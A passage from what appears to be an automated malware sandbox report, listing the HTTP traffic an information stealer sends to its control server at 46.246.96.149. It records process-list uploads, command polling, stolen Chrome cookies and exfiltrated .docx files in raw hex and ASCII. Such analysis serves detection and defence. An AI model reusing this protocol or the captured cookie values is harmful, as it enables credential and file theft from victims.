(x64) - 14.36.32532;Office 16 Click-to-Run Extensibility Component;
Source: global traffic	HTTP traffic detected: POST /proccesses HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 24746Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 70 72 6f 63 65 73 73 65 73 3d 49 44 3a 20 30 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 32 2c 20 4e 61 6d 65 3a 20 52 65 67 69 73 74 72 79 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 33 33 32 2c 20 4e 61 6d 65 3a 20 73 6d 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 32 30 2c 20 4e 61 6d 65 3a 20 63 73 72 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 39 36 2c 20 4e 61 6d 65 3a 20 77 69 6e 69 6e 69 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 35 30 34 2c 20 4e 61 6d 65 3a 20 63 73 72 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 35 36 34 2c 20 4e 61 6d 65 3a 20 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 36 33 32 2c 20 4e 61 6d 65 3a 20 73 65 72 76 69 63 65 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 36 34 30 2c 20 4e 61 6d 65 3a 20 6c 73 61 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 35 32 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 38 30 2c 20 4e 61 6d 65 3a 20 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 38 38 2c 20 4e 61 6d 65 3a 20 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 38 37 32 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 32 34 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 39 32 2c 20 4e 61 6d 65 3a 20 64 77 6d 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 34 34 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 33 32 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 32 38 30 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 31 30 33 32
Source: global traffic	HTTP traffic detected: POST /getpu HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 10Data Raw: 69 64 62 3d 65 5f 75 73 65 72 Data Ascii: idb=e_user
Source: global traffic	HTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=0
Source: global traffic	HTTP traffic detected: POST /sendcookies HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 368Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3c 41 4e 44 3e 6c 6f 67 3d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 46 61 6c 73 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 39 37 38 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 34 2d 31 33 0d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 72 75 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 32 36 39 09 4e 49 44 09 35 31 31 3d 45 66 35 76 50 46 47 77 2d 4d 5a 59 6f 35 68 77 65 2d 30 54 68 41 56 73 6c 62 78 62 6d 76 64 56 5a 77 63 48 6e 71 56 7a 57 48 41 55 31 34 76 35 33 4d 4e 31 56 76 77 76 51 71 38 62 61 59 66 67 32 2d 49 41 74 71 5a 42 56 35 4e 4f 4c 35 72 76 6a 32 4e 57 49 71 72 7a 33 37 37 55 68 4c 64 48 74 4f 67 45 2d 74 4a 61 42 6c 55 42 59 4a 45 68 75 47 73 51 64 71 6e 69 33 6f 54 4a 67 30 62 72 71 76 31 64 6a 64 69 4c 4a 79 76 54 53 55 68 64 4b 2d 63 35 4a 57 61 64 43 53 73 55 4c 50 4c 7a 68 53 78 2d 46 2d 36 77 4f 67 34 0d 3c 41 4e 44 3e 63 6f 75 6e 74 3d 32 Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>name=Google Chrome<AND>log=.google.comFalse/True12404279781P_JAR2023-10-04-13.google.comTrue/True1240427269NID511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4<AND>count=2
Source: global traffic	HTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1117Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b 41 5a 41 50 41 43 4a 4a 57 44 57 54 44 4d 44 44 55 4f 55 4b 56 4d 58 57 4c 57 51 4a 49 55 42 49 53 48 50 44 51 45 52 47 4b 55 4a 56 5a 4e 45 51 58 5a 4c 5a 4c 50 41 41 57 41 49 49 53 57 4d 4e 5a 55 43 4e 48 56 50 58 44 46 55 4d 44 45 51 58 49 4c 54 58 51 41 4a 4d 41 41 52 47 4b 59 42 42 42 49 43 4a 48 4e 4f 46 4a 56 43 47 53 51 4d 42 57 58 4d 51 45 4c 50 5a 4d 53 58 57 4e 57 5a 4f 48 49 4b 54 51 48 53 4e 4f 4f 45 4f 42 4a 5a 59 48 4b 53 57 53 49 53 56 4e 55 43 50 54 4e 44 4b 4c 4a 50 58 46 46 4b 4e 41 5a 57 41 4b 59 57 41 51 57 4b 50 57 4c 50 51 42 4b 5a 4a 4f 4b 48 57 58 55 42 42 58 57 4b 51 46 57 58 54 4e 49 5a 46 59 57 49 47 54 4c 42 48 5a 48 4b 46 52 4a 50 44 42 4a 59 52 51 50 51 42 54 5a 55 51 56 55 52 47 4e 54 51 4a 54 46 5a 43 46 42 54 4f 47 4e 43 53 58 4f 5a 59 55 4c 58 4f 4b 56 59 4f 4e 52 51 4f 54 4e 4f 4d 55 50 56 43 44 42 59 49 52 50 4e 59 5a 53 4c 4b 53 4e 42 4f 57 51 4b 4b 4e 4a 4d 4a 48 4e 52 55 57 42 58 59 4a 47 53 5a 53 50 58 53 4f 4e 47 43 4d 48 54 4e 4f 49 43 58 57 4e 59 47 5a 5a 53 58 55 41 49 45 52 56 4e 46 46 51 4e 58 44 51 56 52 57 46 4d 54 54 4d 53 53 53 4f 42 48 49 4c 42 55 4b 43 44 47 53 4d 4e 4a 42 51 54 52 51 4c 42 44 51 4b 56 52 47 58 4b 57 5a 56 4d 46 41 4c 51 52 47 42 50 4c 4d 47 45 4f 52 4b 4c 42 59 41 4c 4e 47 4a 41 58 4c 4b 47 42 46 47 4a 4a 47 4a 52 55 44 4b 42 4d 51 45 46 4a 58 58 57 4d 41 4a 52 44 54 49 45 44 41 4e 45 50 55 49 4a 43 54 54 44 5a 59 45 51 44 4a 50 4a 49 57 59 44 51 44 52 54 52 55 44 44 5a 53 4a 4c 46 5a 59 49 48 4b 48 52 57 45 47 56 4c 51 43 59 51 41 50 58 4f 49 4a 43 42 45 4c 5a 44 5a 45 4f 46 50 4b 53 49 4a 51 4d 41 51 4d 53 4d 58 42 52 45 51 45 45 48 57 58 47 4d 48 45 55 50 4e 47 56 53 44 5a 41 50 4e 56 58 51 4a 43 50 4c 55 4c 46 51 49 58 52 4d 53 46 43 55 4e 48 48 55 46 46 4a 56 46 4e 51 57 4e 55 55 58 53 4f 4d 53 4e 4a 57 4f 59 4e 55 48 54 48 47 41 5a 53 57 59 4f 4b 49 4b 49 53 4
Source: global traffic	HTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1117Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b 52 49 54 44 41 4c 48 57 51 53 41 50 59 56 41 52 51 47 51 4c 59 58 4c 4d 4e 54 51 53 4c 53 50 41 55 49 57 5a 52 52 52 4f 56 45 47 4e 54 50 4c 4e 51 49 54 54 4a 59 46 4b 4e 58 43 4b 45 52 41 56 58 4c 53 47 48 4c 42 52 4b 54 46 50 4d 58 53 53 49 42 5a 44 4f 4e 58 53 4b 48 58 5a 46 57 4f 4e 50 49 50 54 46 47 4e 52 49 59 52 4d 59 50 5a 58 4c 56 58 45 4a 4a 4d 41 48 4b 43 49 59 57 50 46 44 41 48 47 43 56 46 52 48 55 45 49 48 5a 4b 42 56 4d 52 4d 4c 46 53 4b 4d 4f 4d 44 4d 4d 51 5a 4a 4a 41 4f 46 4e 48 46 41 4d 49 42 43 4c 43 4c 5a 48 51 43 49 4b 4c 4f 42 5a 4c 4e 53 56 42 56 43 48 44 4f 59 49 48 4d 41 57 57 4a 4e 51 48 5a 44 47 4b 56 43 4f 43 49 52 51 4f 59 54 55 46 45 57 41 47 5a 57 42 50 4e 4c 4a 46 57 41 4b 59 45 54 41 43 53 45 5a 4c 4d 49 51 4e 4f 41 41 57 53 47 56 4e 42 5a 5a 5a 4d 53 53 45 46 56 53 45 54 42 56 54 53 4d 54 53 41 4a 48 44 59 57 4c 49 42 4a 50 51 55 48 50 58 57 4f 50 53 56 57 51 56 56 53 4c 50 54 59 4f 57 4a 47 57 4c 58 52 4a 4f 4d 51 4d 42 5a 53 4d 57 4c 5a 5a 44 55 4a 49 55 48 59 5a 4c 55 4e 53 4f 4d 4a 4d 57 45 55 42 57 59 53 5a 4d 58 56 44 4e 55 47 53 5a 42 53 46 44 41 43 4f 49 46 57 45 54 4a 52 49 58 56 50 44 4d 53 56 4d 54 4b 45 4b 4e 48 4a 46 46 58 43 54 50 50 44 4b 59 44 58 4f 55 4f 47 4a 41 46 53 58 56 45 4e 54 49 4d 46 4c 58 4e 4b 42 57 53 4f 49 4a 41 5a 4c 5a 54 58 5a 47 42 42 4d 55 41 54 4d 4e 47 4f 43 4f 4c 48 49 41 4f 4f 54 42 45 4e 58 4a 4c 4e 45 42 50 55 59 5a 41 57 45 57 48 5a 43 4f 42 45 55 58 4c 4e 4f 43 42 46 4d 46 4e 4c 43 46 51 52 59 53 45 55 52 55 45 56 51 53 45 47 56 50 43 56 4e 58 59 4f 55 45 42 50 57 59 4a 56 42 4f 56 5a 48 48 53 49 56 51 45 4c 41 53 4c 4d 46 4c 4d 49 47 50 46 54 53 57 5a 55 59 41 47 55 43 4b 46 43 51 58 58 55 57 4d 4d 45 53 54 49 43 54 48 4f 4e 4c 55 59 53 50 55 57 4f 54 51 4b 57 52 52 51 4d 55 48 47 5a 47 41 41 45 5a 4f 50 4f 4b 51 55 4c 46 57 52 50 45 46 44 59 45 4f 4e 4c 4b 5
Source: global traffic	HTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1129Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 55 56 4f 43 4e 44 42 41 54 56 5a 47 57 4d 56 50 54 5a 4a 53 46 5a 52 48 58 49 52 4a 52 43 4e 4b 47 45 4c 49 57 44 4e 5a 47 41 4d 4b 53 42 57 4d 57 48 4c 46 45 58 47 51 42 4f 55 45 54 56 4a 46 4f 4f 51 58 55 48 56 4c 48 43 4c 4e 50 58 56 4d 4d 4a 41 4a 54 48 4d 57 41 59 4a 4c 54 59 4a 54 46 47 46 4b 51 46 4c 53 56 51 50 50 44 58 42 5a 47 4d 44 50 4e 4d 46 49 50 43 55 41 49 45 43 44 59 53 4c 41 43 46 57 50 4a 42 5a 4c 52 4d 48 57 51 4a 44 44 4f 44 47 59 42 4e 43 4d 4e 50 5a 56 5a 45 46 4f 55 4f 59 59 59 5a 53 54 5a 4b 4c 58 56 43 4e 58 57 50 42 4c 42 43 48 54 51 51 45 46 4f 49 4c 42 45 4a 50 4b 52 55 5a 4a 57 57 44 4e 4b 47 55 4e 41 41 44 57 5a 48 43 4f 55 52 46 46 5a 45 4a 43 50 42 47 49 4c 46 46 43 4e 56 54 41 4e 46 58 4c 57 58 51 44 59 4a 55 4c 48 45 55 51 47 4f 42 4e 55 5a 55 43 46 49 59 45 49 54 54 50 4b 45 5a 51 49 48 50 4f 4b 57 5a 44 4d 4d 53 55 42 49 51 58 48 55 57 42 42 45 47 47 52 47 51 50 43 4b 52 46 4d 41 46 4d 43 4b 42 4c 4e 50 58 55 58 43 43 58 51 44 48 51 58 50 4b 48 56 59 51 57 48 58 45 47 48 49 43 44 4f 5a 4a 55 43 4c 54 42 4b 4b 5a 4b 52 4b 4f 51 41 5a 57 58 48 4b 41 48 56 4b 44 4f 46 47 4b 54 49 51 48 45 47 43 4d 50 59 48 4b 4c 47 49 44 45 53 57 4e 41 56 41 53 46 55 43 4f 47 43 59 51 51 52 4c 57 51 49 57 44 46 46 43 51 59 48 59 48 4b 4b 50 49 42 4f 47 4f 4b 58 57 4f 5a 57 43 56 48 4b 4d 47 54 58 46 58 41 4b 59 59 42 5a 51 47 5a 57 53 4d 46 49 43 4a 52 58 47 44 4c 4a 41 48 50 53 54 4d 50 49 41 58 52 5a 4e 4d 4a 42 48 4a 46 56 5a 4f 57 44 4b 4f 4b 50 44 51 52 4b 49 52 41 52 4a 45 4a 4d 4e 50 43 53 45 57 55 46 48 4b 4c 45 4c 50 5a 57 43 4d 57 4c 5a 54 5a 42 46 57 4a 54 49 42 58 41 5a 42 54 54 4a 4f 45 47 48 43 4c 58 55 5a 59 42 59 47 59 55 4c 46 47 4a 50 4c 55 4e 56 4a 43 54 44 4b 56 55 48 4b 46 43 4d 43 45 53 57 58 4d 44 4c 5a 51 4b 44 55 57 54 41 45 43 52 44 42 57 45 43 58 50 43 48 50 42 43 45 52 44 41 4a 4f 47 46 43 4
Source: global traffic	HTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1130Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b 41 5a 41 50 41 43 4a 4a 57 44 57 54 44 4d 44 44 55 4f 55 4b 56 4d 58 57 4c 57 51 4a 49 55 42 49 53 48 50 44 51 45 52 47 4b 55 4a 56 5a 4e 45 51 58 5a 4c 5a 4c 50 41 41 57 41 49 49 53 57 4d 4e 5a 55 43 4e 48 56 50 58 44 46 55 4d 44 45 51 58 49 4c 54 58 51 41 4a 4d 41 41 52 47 4b 59 42 42 42 49 43 4a 48 4e 4f 46 4a 56 43 47 53 51 4d 42 57 58 4d 51 45 4c 50 5a 4d 53 58 57 4e 57 5a 4f 48 49 4b 54 51 48 53 4e 4f 4f 45 4f 42 4a 5a 59 48 4b 53 57 53 49 53 56 4e 55 43 50 54 4e 44 4b 4c 4a 50 58 46 46 4b 4e 41 5a 57 41 4b 59 57 41 51 57 4b 50 57 4c 50 51 42 4b 5a 4a 4f 4b 48 57 58 55 42 42 58 57 4b 51 46 57 58 54 4e 49 5a 46 59 57 49 47 54 4c 42 48 5a 48 4b 46 52 4a 50 44 42 4a 59 52 51 50 51 42 54 5a 55 51 56 55 52 47 4e 54 51 4a 54 46 5a 43 46 42 54 4f 47 4e 43 53 58 4f 5a 59 55 4c 58 4f 4b 56 59 4f 4e 52 51 4f 54 4e 4f 4d 55 50 56 43 44 42 59 49 52 50 4e 59 5a 53 4c 4b 53 4e 42 4f 57 51 4b 4b 4e 4a 4d 4a 48 4e 52 55 57 42 58 59 4a 47 53 5a 53 50 58 53 4f 4e 47 43 4d 48 54 4e 4f 49 43 58 57 4e 59 47 5a 5a 53 58 55 41 49 45 52 56 4e 46 46 51 4e 58 44 51 56 52 57 46 4d 54 54 4d 53 53 53 4f 42 48 49 4c 42 55 4b 43 44 47 53 4d 4e 4a 42 51 54 52 51 4c 42 44 51 4b 56 52 47 58 4b 57 5a 56 4d 46 41 4c 51 52 47 42 50 4c 4d 47 45 4f 52 4b 4c 42 59 41 4c 4e 47 4a 41 58 4c 4b 47 42 46 47 4a 4a 47 4a 52 55 44 4b 42 4d 51 45 46 4a 58 58 57 4d 41 4a 52 44 54 49 45 44 41 4e 45 50 55 49 4a 43 54 54 44 5a 59 45 51 44 4a 50 4a 49 57 59 44 51 44 52 54 52 55 44 44 5a 53 4a 4c 46 5a 59 49 48 4b 48 52 57 45 47 56 4c 51 43 59 51 41 50 58 4f 49 4a 43 42 45 4c 5a 44 5a 45 4f 46 50 4b 53 49 4a 51 4d 41 51 4d 53 4d 58 42 52 45 51 45 45 48 57 58 47 4d 48 45 55 50 4e 47 56 53 44 5a 41 50 4e 56 58 51 4a 43 50 4c 55 4c 46 51 49 58 52 4d 53 46 43 55 4e 48 48 55 46 46 4a 56 46 4e 51 57 4e 55 55 58 53 4f 4d 53 4e 4a 57 4f 59 4e 55 48 54 48 47 41 5a 53 57 59 4f 4b 49 4b 49 53 4
Source: global traffic	HTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1129Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b 52 49 54 44 41 4c 48 57 51 53 41 50 59 56 41 52 51 47 51 4c 59 58 4c 4d 4e 54 51 53 4c 53 50 41 55 49 57 5a 52 52 52 4f 56 45 47 4e 54 50 4c 4e 51 49 54 54 4a 59 46 4b 4e 58 43 4b 45 52 41 56 58 4c 53 47 48 4c 42 52 4b 54 46 50 4d 58 53 53 49 42 5a 44 4f 4e 58 53 4b 48 58 5a 46 57 4f 4e 50 49 50 54 46 47 4e 52 49 59 52 4d 59 50 5a 58 4c 56 58 45 4a 4a 4d 41 48 4b 43 49 59 57 50 46 44 41 48 47 43 56 46 52 48 55 45 49 48 5a 4b 42 56 4d 52 4d 4c 46 53 4b 4d 4f 4d 44 4d 4d 51 5a 4a 4a 41 4f 46 4e 48 46 41 4d 49 42 43 4c 43 4c 5a 48 51 43 49 4b 4c 4f 42 5a 4c 4e 53 56 42 56 43 48 44 4f 59 49 48 4d 41 57 57 4a 4e 51 48 5a 44 47 4b 56 43 4f 43 49 52 51 4f 59 54 55 46 45 57 41 47 5a 57 42 50 4e 4c 4a 46 57 41 4b 59 45 54 41 43 53 45 5a 4c 4d 49 51 4e 4f 41 41 57 53 47 56 4e 42 5a 5a 5a 4d 53 53 45 46 56 53 45 54 42 56 54 53 4d 54 53 41 4a 48 44 59 57 4c 49 42 4a 50 51 55 48 50 58 57 4f 50 53 56 57 51 56 56 53 4c 50 54 59 4f 57 4a 47 57 4c 58 52 4a 4f 4d 51 4d 42 5a 53 4d 57 4c 5a 5a 44 55 4a 49 55 48 59 5a 4c 55 4e 53 4f 4d 4a 4d 57 45 55 42 57 59 53 5a 4d 58 56 44 4e 55 47 53 5a 42 53 46 44 41 43 4f 49 46 57 45 54 4a 52 49 58 56 50 44 4d 53 56 4d 54 4b 45 4b 4e 48 4a 46 46 58 43 54 50 50 44 4b 59 44 58 4f 55 4f 47 4a 41 46 53 58 56 45 4e 54 49 4d 46 4c 58 4e 4b 42 57 53 4f 49 4a 41 5a 4c 5a 54 58 5a 47 42 42 4d 55 41 54 4d 4e 47 4f 43 4f 4c 48 49 41 4f 4f 54 42 45 4e 58 4a 4c 4e 45 42 50 55 59 5a 41 57 45 57 48 5a 43 4f 42 45 55 58 4c 4e 4f 43 42 46 4d 46 4e 4c 43 46 51 52 59 53 45 55 52 55 